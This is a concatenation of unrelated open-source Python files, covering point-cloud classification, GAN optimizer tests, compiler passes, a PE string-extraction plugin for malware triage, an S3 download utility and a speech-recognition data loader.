super(KDNet, self).__init__()
self.conv1 = nn.Conv1d(3,8 * 3,1,1)
self.conv2 = nn.Conv1d(8,32 * 3,1,1)
self.conv3 = nn.Conv1d(32,64 * 3,1,1)
self.conv4 = nn.Conv1d(64,64 * 3,1,1)
self.conv5 = nn.Conv1d(64,64 * 3,1,1)
self.conv6 = nn.Conv1d(64,128 * 3,1,1)
self.conv7 = nn.Conv1d(128,256 * 3,1,1)
self.conv8 = nn.Conv1d(256,512 * 3,1,1)
self.conv9 = nn.Conv1d(512,512 * 3,1,1)
self.conv10 = nn.Conv1d(512,512 * 3,1,1)
self.conv11 = nn.Conv1d(512,1024 * 3,1,1)
self.fc = nn.Linear(1024, k)
def forward(self, x, c):
def kdconv(x, dim, featdim, sel, conv):
batchsize = x.size(0)
# print(batchsize)
x = F.relu(conv(x))
x = x.view(-1, featdim, 3, dim)
x = x.view(-1, featdim, 3 * dim)
sel = Variable(sel + (torch.arange(0, dim) * 3).long())
if x.is_cuda:
sel = sel.cuda()
x = torch.index_select(x, dim=2, index=sel)
x = x.view(-1, featdim, dim / 2, 2)
x = torch.squeeze(torch.max(x, dim=-1, keepdim=True)[0], 3)
return x
x1 = kdconv(x, 2048, 8, c[-1], self.conv1)
x2 = kdconv(x1, 1024, 32, c[-2], self.conv2)
x3 = kdconv(x2, 512, 64, c[-3], self.conv3)
x4 = kdconv(x3, 256, 64, c[-4], self.conv4)
x5 = kdconv(x4, 128, 64, c[-5], self.conv5)
x6 = kdconv(x5, 64, 128, c[-6], self.conv6)
x7 = kdconv(x6, 32, 256, c[-7], self.conv7)
x8 = kdconv(x7, 16, 512, c[-8], self.conv8)
x9 = kdconv(x8, 8, 512, c[-9], self.conv9)
x10 = kdconv(x9, 4, 512, c[-10], self.conv10)
x11 = kdconv(x10, 2, 1024, c[-11], self.conv11)
x11 = x11.view(-1,1024)
out = F.log_softmax(self.fc(x11))
return out
def split_ps(point_set):
#print point_set.size()
num_points = point_set.size()[0]/2
diff = point_set.max(dim=0)[0] - point_set.min(dim=0)[0]
dim = torch.max(diff, dim = 1)[1][0,0]
cut = torch.median(point_set[:,dim])[0][0]
left_idx = torch.squeeze(torch.nonzero(point_set[:,dim] > cut))
right_idx = torch.squeeze(torch.nonzero(point_set[:,dim] < cut))
middle_idx = torch.squeeze(torch.nonzero(point_set[:,dim] == cut))
if torch.numel(left_idx) < num_points:
left_idx = torch.cat([left_idx, middle_idx[0:1].repeat(num_points - torch.numel(left_idx))], 0)
if torch.numel(right_idx) < num_points:
right_idx = torch.cat([right_idx, middle_idx[0:1].repeat(num_points - torch.numel(right_idx))], 0)
left_ps = torch.index_select(point_set, dim = 0, index = left_idx)
right_ps = torch.index_select(point_set, dim = 0, index = right_idx)
return left_ps, right_ps, dim
def split_ps_reuse(point_set, level, pos, tree, cutdim):
sz = point_set.size()
num_points = np.array(sz)[0]/2
max_value = point_set.max(dim=0)[0]
min_value = -(-point_set).max(dim=0)[0]
diff = max_value - min_value
dim = torch.max(diff, dim = 1)[1][0,0]
cut = torch.median(point_set[:,dim])[0][0]
left_idx = torch.squeeze(torch.nonzero(point_set[:,dim] > cut))
right_idx = torch.squeeze(torch.nonzero(point_set[:,dim] < cut))
middle_idx = torch.squeeze(torch.nonzero(point_set[:,dim] == cut))
if torch.numel(left_idx) < num_points:
left_idx = torch.cat([left_idx, middle_idx[0:1].repeat(num_points - torch.numel(left_idx))], 0)
if torch.numel(right_idx) < num_points:
right_idx = torch.cat([right_idx, middle_idx[0:1].repeat(num_points - torch.numel(right_idx))], 0)
left_ps = torch.index_select(point_set, dim = 0, index = left_idx)
right_ps = torch.index_select(point_set, dim = 0, index = right_idx)
tree[level+1][pos * 2] = left_ps
tree[level+1][pos * 2 + 1] = right_ps
cutdim[level][pos * 2] = dim
cutdim[level][pos * 2 + 1] = dim
return
d = PartDataset(root = 'shapenetcore_partanno_segmentation_benchmark_v0', classification = True, train = False)
l = len(d)
print(len(d.classes), l)
levels = (np.log(num_points)/np.log(2)).astype(int)
net = KDNet().cuda()
#optimizer = optim.SGD(net.parameters(), lr=0.01, momentum=0.9)
model_name = sys.argv[1]
net.load_state_dict(torch.load(model_name))
net.eval()
corrects = []
for j in range(len(d)):
point_set, class_label = d[j]
target = Variable(class_label).cuda()
if target != 0:
pass
point_set = point_set[:num_points]
if point_set.size(0) < num_points:
point_set = torch.cat([point_set, point_set[0:num_points - point_set.size(0)]], 0)
cutdim, tree = make_cKDTree(point_set.numpy(), depth=levels)
cutdim_v = [(torch.from_numpy(np.array(item).astype(np.int64))) for item in cutdim]
points = torch.FloatTensor(tree[-1])
points_v = Variable(torch.unsqueeze(torch.squeeze(points), 0)).transpose(2, 1).cuda()
pred = net(points_v, cutdim_v)
pred_choice = pred.data.max(1)[1]
correct = pred_choice.eq(target.data).cpu().sum()
corrects.append(correct)
print("%d/%d , %f" %(j, len(d), float(sum(corrects))/ float(len(corrects))))
print(float(sum(corrects))/ float(len(d)))
|
tests/cgd_test.py | SachinKumar105/Implicit-Competitive-Regularization | 107 | 11188199 | <reponame>SachinKumar105/Implicit-Competitive-Regularization
from optims.cgd_utils import conjugate_gradient, Hvp_vec
import unittest
import torch
import torch.nn as nn
import torch.autograd as autograd
from optims import BCGD, LCGD
from optims.testOptim import testLCGD, ICR, testBCGD
from tensorboardX import SummaryWriter
device = torch.device('cuda:0') if torch.cuda.is_available() else 'cpu'
class NetD(nn.Module):
def __init__(self):
super(NetD, self).__init__()
self.net = nn.Linear(2, 1)
self.weight_init()
def forward(self, x):
return self.net(x)
def weight_init(self):
self.net.weight.data = torch.Tensor([[1.0, 2.0]])
self.net.bias.data = torch.Tensor([-1.0])
class NetG(nn.Module):
def __init__(self):
super(NetG, self).__init__()
self.net = nn.Linear(1, 2)
self.weight_init()
def forward(self, x):
return self.net(x)
def weight_init(self):
self.net.weight.data = torch.Tensor([[3.0], [-1.0]])
self.net.bias.data = torch.Tensor([-4.0, 3.0])
def train():
D = NetD().to(device)
G = NetG().to(device)
print('===discriminator===')
print(D.net.weight.data)
print(D.net.bias.data)
print('===generator===')
print(G.net.weight.data)
print(G.net.bias.data)
z = torch.tensor([2.0], device=device)
real_x = torch.tensor([[3.0, 4.0]], device=device)
loss = D(G(z)) - D(real_x)
grad_g = autograd.grad(loss, list(G.parameters()), create_graph=True, retain_graph=True)
grad_d = autograd.grad(loss, list(D.parameters()), create_graph=True, retain_graph=True)
g_param = torch.cat([p.contiguous().view(-1) for p in list(G.parameters())])
d_param = torch.cat([p.contiguous().view(-1) for p in list(D.parameters())])
grad_ggt = torch.tensor([2 * d_param[0].data, 2 * d_param[1].data,
d_param[0].data, d_param[1].data], device=device)
grad_dgt = torch.tensor([2 * g_param[0] - 3.0, 2 * g_param[1] - 4.0, 0.0])
grad_g_vec = torch.cat([g.contiguous().view(-1) for g in grad_g])
grad_d_vec = torch.cat([g.contiguous().view(-1) for g in grad_d])
print(grad_g_vec - grad_ggt)
print(grad_d_vec - grad_dgt)
# print(grad_g_vec)
# print(grad_d_vec)
grad_g_vec_d = grad_g_vec.clone().detach()
grad_d_vec_d = grad_d_vec.clone().detach()
hvp_g_vec = Hvp_vec(grad_d_vec, list(G.parameters()), grad_d_vec_d, retain_graph=True)
hvp_d_vec = Hvp_vec(grad_g_vec, list(D.parameters()), grad_g_vec_d, retain_graph=True)
if __name__ == '__main__':
optim_type = 'BCGD'
lr = 0.1
epoch_num = 50
# device = torch.device('cuda:0') if torch.cuda.is_available() else 'cpu'
device = 'cpu'
D = NetD().to(device)
G = NetG().to(device)
writer = SummaryWriter(log_dir='logs/test6/%s-real' % optim_type)
if optim_type == 'ICR':
optimizer = ICR(max_params=G.parameters(), min_params=D.parameters(),
lr=lr, alpha=1.0, device=device)
elif optim_type == 'testBCGD':
optimizer = testBCGD(max_params=G.parameters(), min_params=D.parameters(),
lr_max=lr, lr_min=lr, device=device)
elif optim_type == 'BCGD':
optimizer = BCGD(max_params=G.parameters(), min_params=D.parameters(),
lr_max=lr, lr_min=lr, device=device, solve_x=True)
elif optim_type == 'LCGD':
optimizer = LCGD(max_params=G.parameters(), min_params=D.parameters(),
lr_max=lr, lr_min=lr, device=device)
else:
optimizer = testLCGD(max_params=G.parameters(), min_params=D.parameters(),
lr_max=lr, lr_min=lr, device=device)
for e in range(epoch_num):
z = torch.tensor([2.0], device=device)
real_x = torch.tensor([[3.0, 4.0]], device=device)
loss = D(G(z)) - D(real_x)
optimizer.zero_grad()
optimizer.step(loss)
# if e == 1:
# torch.save({'D': D.state_dict(),
# 'G': G.state_dict()}, 'net.pth')
writer.add_scalar('Generator/Weight0', G.net.weight.data[0].item(), global_step=e)
writer.add_scalar('Generator/Weight1', G.net.weight.data[1].item(), global_step=e)
writer.add_scalar('Generator/Bias0', G.net.bias.data[0].item(), global_step=e)
writer.add_scalar('Generator/Bias1', G.net.bias.data[1].item(), global_step=e)
writer.add_scalar('Discriminator/Weight0', D.net.weight.data[0][0].item(), global_step=e)
writer.add_scalar('Discriminator/Weight1', D.net.weight.data[0][1].item(), global_step=e)
writer.add_scalar('Discriminator/Bias0', D.net.bias.data[0].item(), global_step=e)
writer.close()
|
tests/epyccel/modules/call_user_defined_funcs.py | dina-fouad/pyccel | 206 | 11188201 | # pylint: disable=missing-function-docstring, missing-module-docstring/
# This module test call user defined functions
# through nested functions
from pyccel.decorators import types
def do_nothing():
x = 0
x *= 0
@types('real')
def not_change(s):
s *= s
@types('real', 'real')
def my_div(a, b):
return a / b
@types('real', 'real')
def my_mult(a, b):
return a * b
def my_pi():
return 3.141592653589793
@types('real')
def my_cub(r):
return r * r * r
@types('real')
def circle_volume(radius):
do_nothing()
volume = my_mult(my_mult(my_div(3. , 4.), my_pi()), my_cub(radius))
not_change(volume)
return volume
|
google/datalab/bigquery/_query_stats.py | freyrsae/pydatalab | 198 | 11188230 | <gh_stars>100-1000
# Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under the License
# is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing permissions and limitations under
# the License.
"""Implements representation of BigQuery query job dry run results."""
from __future__ import absolute_import
from __future__ import unicode_literals
from builtins import object
class QueryStats(object):
"""A wrapper for statistics returned by a dry run query. Useful so we can get an HTML
representation in a notebook.
"""
def __init__(self, total_bytes, is_cached):
self.total_bytes = float(total_bytes)
self.is_cached = is_cached
def _repr_html_(self):
self.total_bytes = QueryStats._size_formatter(self.total_bytes)
return """
<p>Dry run information: %s to process, results %s</p>
""" % (self.total_bytes, "cached" if self.is_cached else "not cached")
@staticmethod
def _size_formatter(byte_num, suf='B'):
for mag in ['', 'K', 'M', 'G', 'T']:
if byte_num < 1000.0:
if suf == 'B': # Don't do fractional bytes
return "%5d%s%s" % (int(byte_num), mag, suf)
return "%3.1f%s%s" % (byte_num, mag, suf)
byte_num /= 1000.0
return "%.1f%s%s".format(byte_num, 'P', suf)
|
src/postprocessing/clean_list_with_wordnet.py | paperplanet/SegPhrase | 275 | 11188231 | <gh_stars>100-1000
from nltk.corpus import wordnet as wn
from nltk.corpus.reader import NOUN
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-input", help="input path for concepts file")
parser.add_argument("-output", help="output path for noise file")
args = parser.parse_args()
poor_results = set()
results = list()
with open(args.input, 'r') as input:
for line in input:
results.append(line)
concept = line.split(',')[0]
words = concept.split('_')
word = ''
if len(words) > 1:
synsets = wn.synsets(concept)
if len(synsets) != 0:
noun_synsets = wn.synsets(concept, NOUN)
if len(noun_synsets) == 0:
poor_results.add(concept + ',0.0000000000\n')
continue
else:
continue
word = words[-1]
else:
word = concept
synsets = wn.synsets(word)
if len(synsets) == 0:
pass
else:
noun_synsets = wn.synsets(word, NOUN)
if len(noun_synsets) == 0:
poor_results.add(concept + ',0.0000000000\n')
with open(args.output, 'w') as output:
for line in results:
if line not in poor_results:
output.write(line)
for line in poor_results:
output.write(line)
|
Lib/test/test_classdecorators.py | jimmyyu2004/jython | 332 | 11188233 | <gh_stars>100-1000
# This test is temporary until we can import test_decorators from CPython 3.x
# The reason for not doing that already is that in Python 3.x the name of a
# function is stored in func.__name__, in 2.x it's func.func_name
import unittest
from test import support
class TestClassDecorators(unittest.TestCase):
def test_simple(self):
def plain(x):
x.extra = 'Hello'
return x
@plain
class C(object): pass
self.assertEqual(C.extra, 'Hello')
def test_double(self):
def ten(x):
x.extra = 10
return x
def add_five(x):
x.extra += 5
return x
@add_five
@ten
class C(object): pass
self.assertEqual(C.extra, 15)
def test_order(self):
def applied_first(x):
x.extra = 'first'
return x
def applied_second(x):
x.extra = 'second'
return x
@applied_second
@applied_first
class C(object): pass
self.assertEqual(C.extra, 'second')
def test_main():
support.run_unittest(TestClassDecorators)
if __name__ == '__main__':
test_main()
|
python/iog/eval.py | Suveksha/labelflow | 164 | 11188239 | import os.path
from torch.utils.data import DataLoader
from evaluation.eval import eval_one_result
import dataloaders.pascal as pascal
exp_root_dir = "./"
method_names = []
method_names.append("run_0")
if __name__ == "__main__":
# Dataloader
dataset = pascal.VOCSegmentation(transform=None, retname=True)
dataloader = DataLoader(dataset, batch_size=1, shuffle=False, num_workers=0)
# Iterate through all the different methods
for method in method_names:
for ii in [0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]:
results_folder = os.path.join(exp_root_dir, method, "Results")
filename = os.path.join(
exp_root_dir, "eval_results", method.replace("/", "-") + ".txt"
)
if not os.path.exists(os.path.join(exp_root_dir, "eval_results")):
os.makedirs(os.path.join(exp_root_dir, "eval_results"))
jaccards = eval_one_result(dataloader, results_folder, mask_thres=ii)
val = jaccards["all_jaccards"].mean()
# Show mean and store result
print(ii)
print(
"Result for {:<80}: {}".format(method, str.format("{0:.4f}", 100 * val))
)
with open(filename, "w") as f:
f.write(str(val))
|
magma/passes/passes.py | leonardt/magma | 167 | 11188240 | <filename>magma/passes/passes.py
from abc import ABC, abstractmethod
from magma.is_definition import isdefinition
from magma.linking import get_all_linked_modules, has_any_linked_modules
from magma.passes.tsort import tsort
__all__ = ['Pass', 'InstancePass', 'DefinitionPass', 'InstanceGraphPass',
'pass_lambda', 'instance_graph', 'dependencies']
class Pass(ABC):
"""Abstract base class for all passes"""
def __init__(self, main):
self.main = main
def run(self):
self.done()
return self
def done(self):
pass
class InstancePass(Pass):
def __init__(self, main):
super().__init__(main)
self.instances = []
def _run(self, defn, path):
for inst in defn.instances:
inst_defn = type(inst)
inst_path = path + (inst, )
self.instances.append(inst_path)
if callable(self):
self(inst_path)
if isdefinition(inst_defn):
self._run(inst_defn, inst_path)
def run(self):
self._run(self.main, tuple())
self.done()
return self
class CircuitPass(Pass):
"""
Run on all circuits (not just definitions)
"""
def __init__(self, main):
super().__init__(main)
self.circuits = {}
def _run(self, circuit):
if isdefinition(circuit):
for inst in circuit.instances:
self._run(type(inst))
link_targets = get_all_linked_modules(circuit)
for target in link_targets:
self._run(target)
# Call each definition only once.
id_ = id(circuit)
if id_ not in self.circuits:
self.circuits[id_] = circuit
if callable(self):
self(circuit)
def run(self):
self._run(self.main)
self.done()
return self
class DefinitionPass(CircuitPass):
"""
Run only only on circuits with definitions
"""
def _run(self, circuit):
if not isdefinition(circuit) and not has_any_linked_modules(circuit):
return
super()._run(circuit)
class BuildInstanceGraphPass(DefinitionPass):
def __init__(self, main):
super().__init__(main)
self.graph = {}
def __call__(self, defn):
if defn not in self.graph:
self.graph[defn] = []
for inst in defn.instances:
inst_defn = type(inst)
if inst_defn not in self.graph:
self.graph[inst_defn] = []
if inst_defn not in self.graph[defn]:
self.graph[defn].append(inst_defn)
for target in get_all_linked_modules(defn):
if target not in self.graph[defn]:
self.graph[defn].append(target)
def done(self):
graph = []
for vert, edges in self.graph.items():
graph.append((vert, edges))
self.tsortedgraph = tsort(graph)
class InstanceGraphPass(Pass):
def __init__(self, main):
super(InstanceGraphPass, self).__init__(main)
pass_ = BuildInstanceGraphPass(main).run()
self.tsortedgraph = pass_.tsortedgraph
if callable(self):
for vert, edges in self.tsortedgraph:
self(vert, edges)
class EditDefinitionPass(DefinitionPass):
@abstractmethod
def edit(self, circuit):
raise NotImplementedError()
def __call__(self, circuit):
with circuit.open():
self.edit(circuit)
# Auxiliary method to convert a simple pass, into a functional form, such as:
#
# SomePass(ckt).run() <-> some_pass(ckt)
#
def pass_lambda(cls):
def _fn(main, *args, **kwargs):
p = cls(main, *args, **kwargs)
p.run()
return p
return _fn
def instance_graph(ckt):
p = pass_lambda(BuildInstanceGraphPass)(ckt)
return p.tsortedgraph
def dependencies(ckt, include_self=False):
graph = instance_graph(ckt)
deps = [dep for dep, _ in graph]
if include_self:
return deps
return list(filter(lambda dep: dep is not ckt, deps))
|
src/PlugIns/PE/StringPlug.py | codexgigassys/codex-backend | 161 | 11188266 | <filename>src/PlugIns/PE/StringPlug.py
# Copyright (C) 2016 <NAME>.
# This file is part of CodexGigas - https://github.com/codexgigassys/
# See the file 'LICENSE' for copying permission.
from PlugIns.PlugIn import PlugIn
from Modules.MetaDataModule import *
from Modules.PEFileModule import PEFileModule
import validators
import re
class StringPlug(PlugIn):
def __init__(self, sample=None):
PlugIn.__init__(self, sample)
def getPath(self):
return "particular_header.strings"
def getName(self):
return "strings"
def getVersion(self):
return 3
def process(self):
ret = {}
data = ""
pelib = self._getLibrary(PEFileModule().getName())
if(pelib is None):
data = self.sample.getBinary()
else:
for section in pelib.sections:
data = data + section.get_data()
regexp = '[A-Za-z0-9/\-:.,_$&@=?%()[\]<> ]{4,}'
strings = re.findall(regexp, data)
aux = {}
for s in strings:
aux[repr(s).lower()] = True
unique_strings = []
for k in aux:
unique_strings.append(k)
mdc = self._getLibrary(MetaDataModule().getName())
if(mdc is None):
return ret
searchUsed = {}
imports = self.sample.getLastValue("particular_header.imports")
if(imports is not None):
for i in imports:
searchUsed[i["lib"]] = True
for f in i["functions"]:
searchUsed[f] = True
exports = self.sample.getLastValue("particular_header.exports.symbols")
if(exports is not None):
# print("No exports")
for i in exports:
searchUsed[i["name"]] = True
if(hasattr(i, "forwarder_dll") and hasattr(i, "forwarder_function")):
searchUsed[i["forwarder_dll"]] = True
searchUsed[i["forwarder_function"]] = True
version_p = self.sample.getLastValue(
"particular_header.version.string_file_info")
if(version_p is not None):
for k in version_p.keys():
searchUsed["'" + str(version_p[k]) + "'"] = True
raw = []
hidden = []
email = []
url = []
ip_l = []
dll = []
domain = []
interesting = []
registry = []
for s in unique_strings:
# checking if the import is declared or not
# print(s)
# print(searchUsed.get(repr(s).lower()))
# raw_input()
if(searchUsed.get(s) is True):
continue
raw.append(s)
# searching if its an import or not
r = mdc.searchImportByName(s)
if(r is not None):
hidden.append(s)
continue
evaluado = eval(s)
# searching dll
r = mdc.searchDllByName(s)
if(r is not None):
dll.append(s)
continue
# searching for filenames
types = ["exe", "dll", "bat", "sys", "htm", "html", "js", "jar", "jpg",
"png", "vb", "scr", "pif", "chm", "zip", "rar", "cab", "pdf",
"doc", "docx", "ppt", "pptx", "xls", "xlsx", "swf", "gif", "pdb", "cpp"]
salir = False
for pat in types:
if(s.find("." + pat) != -1):
interesting.append(s)
salir = True
break
if salir:
continue
# searching email
if(validators.email(evaluado)):
email.append(s)
continue
# searching url
if(validators.url(evaluado)):
url.append(s)
continue
# searching ips
if(validators.ipv4(evaluado)): # or validators.ipv6(evaluado)):
ip_l.append(s)
continue
# searching registry
if(s.find("HKLM\\") != -1 or s.find("HKCU\\") != -1):
registry.append(s)
continue
# searching domains
if(validators.domain(evaluado)):
domain.append(s)
continue
ret["raw_strings"] = sorted(raw)
if(len(hidden) > 0):
ret["hidden_imports"] = sorted(hidden)
if(len(email) > 0):
ret["emails"] = sorted(email)
if(len(url) > 0):
ret["urls"] = sorted(url)
if(len(ip_l) > 0):
ret["ips"] = sorted(ip_l)
if(len(dll) > 0):
ret["hidden_dll"] = sorted(dll)
if(len(domain) > 0):
ret["domains"] = sorted(domain)
if(len(interesting) > 0):
ret["interesting"] = sorted(interesting)
if(len(registry) > 0):
ret["registry"] = sorted(registry)
return ret
|
tests/problems/test_santa.py | bahia14/Evol | 161 | 11188278 | import math
import pytest
from evol.problems.routing import MagicSanta
@pytest.fixture
def base_problem():
return MagicSanta(city_coordinates=[(0, 1), (1, 0), (1, 1)],
home_coordinate=(0, 0),
gift_weight=[0, 0, 0])
@pytest.fixture
def adv_problem():
return MagicSanta(city_coordinates=[(0, 1), (1, 1), (0, 1)],
home_coordinate=(0, 0),
gift_weight=[5, 1, 1],
sleigh_weight=2)
def test_error_raised_wrong_cities(base_problem):
# we want an error if we see too many cities
with pytest.raises(ValueError) as execinfo1:
base_problem.eval_function([[0, 1, 2, 3]])
assert "Extra: {3}" in str(execinfo1.value)
# we want an error if we see too few cities
with pytest.raises(ValueError) as execinfo2:
base_problem.eval_function([[0, 2]])
assert "Missing: {1}" in str(execinfo2.value)
# we want an error if we see multiple occurences of cities
with pytest.raises(ValueError) as execinfo3:
base_problem.eval_function([[0, 2], [0, 1]])
assert "Multiple occurrences found for cities: {0}" in str(execinfo3.value)
def test_base_score_method(base_problem):
assert base_problem.distance((0, 0), (0, 2)) == 2
expected = 1 + math.sqrt(2) + 1 + math.sqrt(2)
assert base_problem.eval_function([[0, 1, 2]]) == pytest.approx(expected)
assert base_problem.eval_function([[2, 1, 0]]) == pytest.approx(expected)
base_problem.sleigh_weight = 2
assert base_problem.eval_function([[2, 1, 0]]) == pytest.approx(2*expected)
def test_sleight_gift_weights(adv_problem):
expected = (2+7) + (2+2) + (2+1) + (2+0)
assert adv_problem.eval_function([[0, 1, 2]]) == pytest.approx(expected)
def test_multiple_routes(adv_problem):
expected = (2 + 6) + (2 + 1) + math.sqrt(2)*(2 + 0) + (2 + 1) + (2 + 0)
assert adv_problem.eval_function([[0, 1], [2]]) == pytest.approx(expected)
|
inpainting/models/utils.py | m-svo/video-object-removal | 2,462 | 11188302 | import torch
import torch.nn as nn
from torch.autograd import Variable
from torch.backends import cudnn
from random import *
import numpy as np
import matplotlib.pyplot as plt
import torch.nn.functional as F
def down_sample(x, size=None, scale_factor=None, mode='nearest'):
# define size if user has specified scale_factor
if size is None: size = (int(scale_factor*x.size(2)), int(scale_factor*x.size(3)))
# create coordinates
h = torch.arange(0,size[0]) / (size[0]-1) * 2 - 1
w = torch.arange(0,size[1]) / (size[1]-1) * 2 - 1
# create grid
grid =torch.zeros(size[0],size[1],2)
grid[:,:,0] = w.unsqueeze(0).repeat(size[0],1)
grid[:,:,1] = h.unsqueeze(0).repeat(size[1],1).transpose(0,1)
# expand to match batch size
grid = grid.unsqueeze(0).repeat(x.size(0),1,1,1)
if x.is_cuda: grid = Variable(grid).cuda()
# do sampling
return F.grid_sample(x, grid, mode=mode)
def reduce_mean(x):
for i in range(4):
if i==1: continue
x = torch.mean(x, dim=i, keepdim=True)
return x
def l2_norm(x):
def reduce_sum(x):
for i in range(4):
if i==1: continue
x = torch.sum(x, dim=i, keepdim=True)
return x
x = x**2
x = reduce_sum(x)
return torch.sqrt(x)
def show_image(real, masked, stage_1, stage_2, fake, offset_flow):
batch_size = real.shape[0]
(real, masked, stage_1, stage_2, fake, offset_flow) = (
var_to_numpy(real),
var_to_numpy(masked),
var_to_numpy(stage_1),
var_to_numpy(stage_2),
var_to_numpy(fake),
var_to_numpy(offset_flow)
)
# offset_flow = (offset_flow*2).astype(int) -1
for x in range(batch_size):
if x > 5 :
break
fig, axs = plt.subplots(ncols=5, figsize=(15,3))
axs[0].set_title('real image')
axs[0].imshow(real[x])
axs[0].axis('off')
axs[1].set_title('masked image')
axs[1].imshow(masked[x])
axs[1].axis('off')
axs[2].set_title('stage_1 image')
axs[2].imshow(stage_1[x])
axs[2].axis('off')
axs[3].set_title('stage_2 image')
axs[3].imshow(stage_2[x])
axs[3].axis('off')
axs[4].set_title('fake_image')
axs[4].imshow(fake[x])
axs[4].axis('off')
# axs[5].set_title('C_Attn')
# axs[5].imshow(offset_flow[x])
# axs[5].axis('off')
plt.show()
def var_to_numpy(obj, for_vis=True):
if for_vis:
obj = obj.permute(0,2,3,1)
obj = (obj+1) / 2
return obj.data.cpu().numpy()
def to_var(x, volatile=False):
if torch.cuda.is_available():
x = x.cuda()
return Variable(x, volatile=volatile) |
walrus/counter.py | pavel-francirek/walrus | 1,039 | 11188337 | <filename>walrus/counter.py
class Counter(object):
"""
Simple counter.
"""
def __init__(self, database, name):
"""
:param database: A walrus ``Database`` instance.
:param str name: The name for the counter.
"""
self.database = database
self.name = name
self.key = 'counter:%s' % self.name
if self.key not in self.database:
self.database[self.key] = 0
def decr(self, decr_by=1):
return self.database.decr(self.key, decr_by)
def incr(self, incr_by=1):
return self.database.incr(self.key, incr_by)
def value(self):
return int(self.database[self.key])
def _op(self, method, other):
if isinstance(other, Counter):
other = other.value()
if not isinstance(other, int):
raise TypeError('Cannot add %s, not an integer.' % other)
method(other)
return self
def __iadd__(self, other):
return self._op(self.incr, other)
def __isub__(self, other):
return self._op(self.decr, other)
__add__ = __iadd__
__sub__ = __isub__
|
z3/get.py | ElvisTheKing/z3 | 287 | 11188369 | import argparse
import sys
import re
import boto3
import botocore
from boto3.s3.transfer import TransferConfig
from z3.config import get_config
MB = 1024 ** 2
def main():
cfg = get_config()
parser = argparse.ArgumentParser(
description='Read a key from s3 and write the content to stdout',
)
parser.add_argument('name', help='name of S3 key')
args = parser.parse_args()
extra_config = {}
if 'HOST' in cfg:
extra_config['endpoint_url'] = cfg['HOST']
config = TransferConfig(max_concurrency=int(cfg['CONCURRENCY']), multipart_chunksize=int(re.sub('M', '', cfg['CHUNK_SIZE'])) * MB)
if 'S3_KEY_ID' in cfg:
s3 = boto3.client('s3', aws_access_key_id=cfg['S3_KEY_ID'], aws_secret_access_key=cfg['S3_SECRET'], **extra_config)
else:
s3 = boto3.client('s3', **extra_config)
try:
s3.download_fileobj(cfg['BUCKET'], args.name, sys.stdout, Config=config)
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] == "404":
print("The object does not exist.")
else:
raise
if __name__ == '__main__':
main()
|
speech_recognition/rnnt/pytorch/dataset.py | CaoZhongZ/inference | 388 | 11188376 | <filename>speech_recognition/rnnt/pytorch/dataset.py
# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This file contains classes and functions related to data loading
"""
from collections import namedtuple
import torch
import numpy as np
from torch.utils.data import Dataset
from parts.manifest import Manifest
from parts.features import WaveformFeaturizer
def seq_collate_fn(batch):
"""batches samples and returns as tensors
Args:
batch : list of samples
Returns
batches of tensors
"""
audio_lengths = torch.LongTensor([sample.waveform.size(0)
for sample in batch])
transcript_lengths = torch.LongTensor([sample.transcript.size(0)
for sample in batch])
permute_indices = torch.argsort(audio_lengths, descending=True)
audio_lengths = audio_lengths[permute_indices]
transcript_lengths = transcript_lengths[permute_indices]
padded_audio_signals = torch.nn.utils.rnn.pad_sequence(
[batch[i].waveform for i in permute_indices],
batch_first=True
)
transcript_list = [batch[i].transcript
for i in permute_indices]
packed_transcripts = torch.nn.utils.rnn.pack_sequence(transcript_list,
enforce_sorted=False)
# TODO: Don't I need to stop grad at some point now?
return (padded_audio_signals, audio_lengths, transcript_list,
packed_transcripts, transcript_lengths)
class AudioToTextDataLayer:
"""Data layer with data loader
"""
def __init__(self, **kwargs):
featurizer_config = kwargs['featurizer_config']
pad_to_max = kwargs.get('pad_to_max', False)
perturb_config = kwargs.get('perturb_config', None)
manifest_filepath = kwargs['manifest_filepath']
dataset_dir = kwargs['dataset_dir']
labels = kwargs['labels']
batch_size = kwargs['batch_size']
drop_last = kwargs.get('drop_last', False)
shuffle = kwargs.get('shuffle', True)
min_duration = featurizer_config.get('min_duration', 0.1)
max_duration = featurizer_config.get('max_duration', None)
normalize_transcripts = kwargs.get('normalize_transcripts', True)
trim_silence = kwargs.get('trim_silence', False)
sampler_type = kwargs.get('sampler', 'default')
speed_perturbation = featurizer_config.get('speed_perturbation', False)
sort_by_duration = sampler_type == 'bucket'
self._featurizer = WaveformFeaturizer.from_config(
featurizer_config, perturbation_configs=perturb_config)
self._dataset = AudioDataset(
dataset_dir=dataset_dir,
manifest_filepath=manifest_filepath,
labels=labels, blank_index=len(labels),
sort_by_duration=sort_by_duration,
pad_to_max=pad_to_max,
featurizer=self._featurizer, max_duration=max_duration,
min_duration=min_duration, normalize=normalize_transcripts,
trim=trim_silence, speed_perturbation=speed_perturbation)
print('sort_by_duration', sort_by_duration)
self._dataloader = torch.utils.data.DataLoader(
dataset=self._dataset,
batch_size=batch_size,
collate_fn=lambda b: seq_collate_fn(b),
drop_last=drop_last,
shuffle=shuffle,
num_workers=0,
pin_memory=True,
sampler=None
)
def __len__(self):
return len(self._dataset)
@property
def data_iterator(self):
return self._dataloader
class AudioDataset(Dataset):
def __init__(self, dataset_dir, manifest_filepath, labels, featurizer, max_duration=None, pad_to_max=False,
min_duration=None, blank_index=0, max_utts=0, normalize=True, sort_by_duration=False,
trim=False, speed_perturbation=False):
"""Dataset that loads tensors via a json file containing paths to audio files, transcripts, and durations
(in seconds). Each entry is a different audio sample.
Args:
dataset_dir: absolute path to dataset folder
